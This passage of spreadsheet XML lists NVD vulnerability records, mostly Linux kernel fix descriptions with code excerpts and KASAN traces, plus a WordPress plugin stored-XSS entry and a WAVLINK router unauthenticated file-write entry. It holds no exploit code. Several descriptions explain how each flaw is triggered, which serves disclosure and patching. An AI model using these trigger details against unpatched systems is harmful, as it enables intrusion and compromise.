        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse News  WordPress plugin before 3.3.3 does not restrict the extra HTML it adds to WordPress's allowed elements to the context it is meant for, applying the same relaxed list to every sanitisation context including untrusted comments, allowing unauthenticated users to store JavaScript that will execute in the browser of any administrator who reviews the comment queue, and of any visitor to the post once the comment is approved.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85677</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89009</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>WAVLINK WN535M1 and WN535M3 routers running firmware prior to M35M1_V250922 contain an unauthenticated arbitrary file write vulnerability that allows remote attackers to overwrite any file on the device by sending a crafted payload to the sync_server daemon on TCP port 13136. The daemon, which runs as root and requires no authentication, accepts a 100-byte filename field in its protocol header without path canonicalization, allowing attackers to supply an absolute path and write arbitrary content to overwrite startup scripts or credential stores to achieve persistent system compromise.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89009</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89445</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommufd: Fix UAF in selftest IOPF reporting
IOMMUFD selftest TRIGGER_IOPF borrows an attach handle from
group-&gt;pasid_array without synchronizing against PASID detach,
then a concurrent iommu_report_device_fault() can dereference
that borrowed handle's domain pointer after the detach erases
the handle and frees the backing struct iommufd_attach_handle.
TRIGGER_IOPF then dereferences the freed handle, causing a UAF.
Fix by adding a iopf_rwsem in mock_dev to follow the expected design
of a real driver. Hold its read side across the whole
iommu_report_device_fault() call, and its write side around every
path that attaches, detaches, or replaces a device domain.
This can block new reports and drains in-flight reports before an old
attach handle or the IOPF fault parameter can be removed.
Also take the write side while registering a mock device, since
it can invoke the mock driver's default-domain attach callback.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89445</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89450</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Reject a vSID wider than the SID_MATCH field
tegra241_vintf_init_vsid() programs the guest-provided vSID into SID_MATCH,
whose VIRT_SID field spans bits [20:1] with bit 0 as the match-enable flag.
The HW therefore matches only a 20-bit Stream ID.
The bound check rejects only virt_sid &gt; UINT_MAX, which admits a value far
wider than the field. The write "virt_sid &lt;&lt; 1 | 0x1" then drops every bit
above 20: a virt_sid of 0x80000000 lands as SID_MATCH = 0x1, a valid match
on vSID 0, so the entry aliases the wrong Stream ID. Because vdev-&gt;virt_id
is guest-controlled, a VMM can trigger it.
Validate virt_sid against the field width with FIELD_MAX(), and program the
register with FIELD_PREP() so the value and the field stay consistent.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89450</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89493</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate rl_used against rl_count in refcount block validator
ocfs2_find_refcount_rec_in_rl() walks the on-disk refcount record array
with:
	for (; i &lt; le16_to_cpu(rb-&gt;rf_records.rl_used); i++) {
		rec = &amp;rb-&gt;rf_records.rl_recs[i];
		...
rl_recs[] lives in a single metadata block (4096 bytes on the common
configuration), so its real capacity is fixed by
ocfs2_refcount_recs_per_rb(sb) (247 records for a 4K block with the
16-byte ocfs2_refcount_rec).  rl_used and rl_count are both read directly
off disk by ocfs2_validate_refcount_block() and are never checked against
that capacity, nor against each other, before any refcount/reflink/CoW
operation walks the array.
A crafted (or corrupted) refcount block with rl_used == 0xffff makes the
loop above walk far past the end of the block, dereferencing rl_recs[i]
for i up to 65534.  The resulting index is then handed to the sibling
ocfs2_insert_refcount_rec(), whose insert-shift does:
	if (index &lt; le16_to_cpu(rf_list-&gt;rl_used))
		memmove(&amp;rf_list-&gt;rl_recs[index + 1],
			&amp;rf_list-&gt;rl_recs[index],
			(le16_to_cpu(rf_list-&gt;rl_used) - index) *
			 sizeof(struct ocfs2_refcount_rec));
i.e.  a memmove() of up to (0xffff - index) * 16 bytes (~1 MiB) from an
offset already past the block.  This is reachable from an ordinary reflink
(FICLONE) against a crafted/corrupted ocfs2 image: attaching an extent
whose cpos sorts past every real record in the leaf forces the lookup to
run off the end instead of returning early on a match.  The attacker model
is local: CAP_SYS_ADMIN mounting a crafted or corrupted ocfs2 image, or a
raw write to the block device backing an already-mounted ocfs2 filesystem.
ocfs2_validate_refcount_block() already validates the block's ECC,
signature, rf_blkno and rf_fs_generation, but never rl_count/rl_used
against the block's actual on-disk capacity.  This is the same class of
gap that ocfs2_validate_extent_block() (fs/ocfs2/alloc.c) already closes
for the sibling extent-list header, which checks both the record capacity
and the "used" bound before any code walks h_list.l_recs[]:
	if (le16_to_cpu(eb-&gt;h_list.l_count) != ocfs2_extent_recs_per_eb(sb)) {
		rc = ocfs2_error(...);
		goto bail;
	}
	if (le16_to_cpu(eb-&gt;h_list.l_next_free_rec) &gt;
	    le16_to_cpu(eb-&gt;h_list.l_count)) {
		rc = ocfs2_error(...);
		goto bail;
	}
Add the equivalent pair of checks to ocfs2_validate_refcount_block():
reject a refcount block whose rl_count does not match the fixed per-block
capacity returned by ocfs2_refcount_recs_per_rb(), and reject rl_used &gt;
rl_count.  Both checks are skipped when OCFS2_REFCOUNT_TREE_FL is set,
because in that case the same union bytes hold an ocfs2_extent_list
(rf_list), not the refcount record list (rf_records) -- that layout is
already validated separately by ocfs2_validate_extent_block() when the
referenced extent block is read.  This mirrors the existing
"!(rb-&gt;rf_flags &amp; OCFS2_REFCOUNT_TREE_FL)" guard used elsewhere in this
file (e.g.  ocfs2_get_refcount_rec()) to decide whether rf_records or
rf_list is the live member of the union.
With this in place, a forged rl_used/rl_count is caught at block
validation time (ocfs2_error()), consistent with every other corruption
check in this function, instead of driving an out-of-bounds read in
ocfs2_find_refcount_rec_in_rl() and a subsequent out-of-bounds memmove()
in ocfs2_insert_refcount_rec().
Verified against a crafted image on a v6.19 KASAN (KASAN_GENERIC) build:
replaying the same reflink (FICLONE) reliably hit a KASAN report in
__ocfs2_increase_refcount()/ocfs2_insert_refcount_rec() before this patch,
and triggers no report once ocfs2_validate_refcount_block() rejects the
forged rl_used/rl_count.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89493</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89513</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RISC-V: KVM: Fix PMU event info array size overflow
SBI PMU EVENT_GET_INFO stores guest-controlled num_events * sizeof(*einfo)
in a 32-bit integer. On RV64, num_events = 0x10000001 makes 0x100000010
truncate to 16. KVM then allocates one entry but loops over the original
num_events, causing out-of-bounds reads and writes. A nested guest
triggered:
BUG: KASAN: slab-out-of-bounds in kvm_riscv_vcpu_pmu_event_info+0xa4/0x142
Read of size 4 at addr ff600000074d46b0 by task init/1
Call Trace:
[&lt;ffffffff8006471c&gt;] kvm_riscv_vcpu_pmu_event_info+0xa4/0x142
[&lt;ffffffff800690c0&gt;] kvm_sbi_ext_pmu_handler+0xca/0x268
[&lt;ffffffff8006779e&gt;] kvm_riscv_vcpu_sbi_ecall+0xec/0x1e6
[&lt;ffffffff8006008c&gt;] kvm_riscv_vcpu_exit+0x48c/0x540
[&lt;ffffffff8005ea0a&gt;] kvm_arch_vcpu_ioctl_run+0x37e/0xc80
Allocated by task 1:
 __kmalloc_noprof+0x19e/0x4b0
 kvm_riscv_vcpu_pmu_event_info+0x72/0x142
 kvm_sbi_ext_pmu_handler+0xca/0x268
 kvm_riscv_vcpu_sbi_ecall+0xec/0x1e6
 kvm_riscv_vcpu_exit+0x48c/0x540
 kvm_arch_vcpu_ioctl_run+0x37e/0xc80
The buggy address is located 0 bytes to the right of
 allocated 16-byte region [ff600000074d46a0, ff600000074d46b0)
Store the shared-memory size in size_t and reject multiplication overflow.
Allocate the guest-driven array with GFP_KERNEL_ACCOUNT so it is charged
to kmemcg, and use __GFP_NOWARN to suppress allocation failure warnings.
Use kvcalloc() to allow vmalloc fallback and an unsigned long loop index
to match num_events.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89513</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89534</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Clear sc_cm_id when ADDR_CHANGE replacement fails
When svc_rdma_listen_handler() handles RDMA_CM_EVENT_ADDR_CHANGE,
it creates a replacement listener cm_id and returns 1, telling
the CM core to destroy the old one. If the replacement allocation
fails, sc_cm_id still points at the old cm_id that the CM core is
about to destroy. Any subsequent dereference of sc_cm_id --
such as svc_rdma_detach()'s rdma_disconnect() call -- is a
use-after-free.
NULL sc_cm_id on the failure path and guard svc_rdma_detach()'s
rdma_disconnect() call against NULL so that the listener can
be torn down safely when the server shuts down.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89534</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89569</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: RFCOMM: serialize security confirmation handling
rfcomm_security_cfm() looks up a session on session_list and then walks
its DLC list without holding rfcomm_mutex. Since RFCOMM session teardown
uses rfcomm_mutex, krfcommd can close and free the same session and DLCs
concurrently:
  hci_rx_work                    krfcommd
  -----------                    ---------
  rfcomm_session_get()
                                 rfcomm_lock()
                                 rfcomm_session_close()
                                   rfcomm_dlc_unlink()
                                   rfcomm_session_del()
                                     kfree(s)
                                 rfcomm_unlock()
  walk s-&gt;dlcs
The callback can then read a freed session list head and touch freed DLCs
while updating their flags or timers.
Serialize the session lookup and DLC traversal in rfcomm_security_cfm()
with rfcomm_mutex. This matches the existing RFCOMM session lifetime
rules and prevents concurrent rfcomm_session_del() / rfcomm_dlc_unlink()
from tearing the objects down while the callback is using them.
KASAN reported:
  BUG: KASAN: slab-use-after-free in rfcomm_security_cfm+0x41c/0x440
  Read of size 8 at addr ffff888111fb3960 by task kworker/u17:1/89
  Workqueue: hci0 hci_rx_work
  Call Trace:
   rfcomm_security_cfm+0x41c/0x440
   hci_encrypt_cfm+0x139/0x590
   hci_encrypt_change_evt+0x37b/0xc40
   hci_event_packet+0x71b/0xb20
   hci_rx_work+0x293/0x730
  Allocated by task 69:
   rfcomm_session_add+0x9e/0x2f0
   rfcomm_run+0x44b/0x41e0
  Freed by task 69:
   kfree+0x131/0x3c0
   rfcomm_session_del+0x188/0x220
   rfcomm_run+0x1985/0x41e0</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89569</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89601</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext2: Fix lost inode updates for IS_SYNC inodes
ext2_setsize() and ext2_xattr_set2() had a construct like:
	if (IS_SYNC(inode)) {
		sync_inode_metadata(inode, 1);
	} else {
		mark_inode_dirty(inode);
	}
which leads to lost inode updates for IS_SYNC inodes because
sync_inode_metadata() does anything only if the inode is already dirty
and hence inode updates may be simply lost. Fix the problem by
unconditionally marking the inode dirty and *then* call
sync_inode_metadata().</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89601</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89626</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sensor: custom: Fix field sysfs group cleanup on failure
hid_sensor_custom_add_attributes() creates one sysfs group for each
custom sensor field. If sysfs_create_group() fails after some groups
have already been created, the function returns the error without
removing the previously created groups.
Add a local unwind path to remove the groups that were already created.
With enable_sensor exposed only after the field attributes are ready,
this path can free sensor_inst-&gt;fields without leaving enable_sensor
able to access pointers into that array.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89626</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89663</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: revoke copy-notify stateids before dropping their reference
Copy-notify stateids live in the s2s_cp_stateids IDR and on their parent
stid's sc_cp_list, pinned by a single membership reference.
_free_cpntf_state_locked() only unlinks an entry once its refcount reaches
zero, so any revoke path that runs while a concurrent
find_cpntf_state()/manage_cpntf_state() holder has elevated cs_count drops
the reference without unlinking, leaving the entry discoverable with its
membership reference already consumed. A second revoke or a laundromat tick
then frees it while the reader still holds the pointer -- a
KASAN-detectable use-after-free at the reader's nfs4_put_cpntf_state().
This affected all three revoke paths:
  - The parent-stid drain (nfs4_free_cpntf_statelist()) repeatedly called
    _free_cpntf_state_locked() on the first list entry; a holder that had
    bumped cs_count made it return early, so the next iteration
    re-decremented and burned the holder's reference.
  - OFFLOAD_CANCEL (manage_cpntf_state()) and laundromat expiry likewise
    used _free_cpntf_state_locked() and could drop 2-&gt;1 without unlinking.
Add revoke_cpntf_state_locked(), which unhashes the entry from the IDR and
sc_cp_list first (deferring the final free to any holder), and use it from
all three revoke paths. The drain now walks with list_for_each_entry_safe()
and revokes each entry unconditionally, so it terminates in one pass per
entry regardless of cs_count. The unhash is gated on
!list_empty(&amp;cps-&gt;cp_list); the idr_remove() gate matters because
idr_alloc_cyclic() may have recycled the so_id by then. Keep
_free_cpntf_state_locked() for the reference-holder put path only, where a
concurrent revoke may already have unlinked the entry (its list_del_init()
then a no-op).</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89663</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89725</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: stm32: prevent out-of-bounds write on RX overflow
stm32_rx_done() appends each received CEC byte to rx_msg.msg[] using
rx_msg.len as the write index, incrementing it on every RXBR
(receive-byte-ready) interrupt without checking it against the buffer
size:
	cec-&gt;rx_msg.msg[cec-&gt;rx_msg.len++] = val &amp; 0xFF;
rx_msg.msg[] is a fixed CEC_MAX_MSG_SIZE (16) byte array in struct
cec_msg, and rx_msg.len is only reset on RXACKE/RXOVR or after a
completed message (RXEND). The number of bytes received before RXEND is
decided by the remote CEC device (it sets EOM), not by the driver. A
peer that keeps sending bytes without ending the message drives RXBR
repeatedly, pushing rx_msg.len past 16 and writing peer-controlled bytes
out of bounds into the surrounding memory. This is reachable in normal
operation once the driver has probed and receiving is enabled, from the
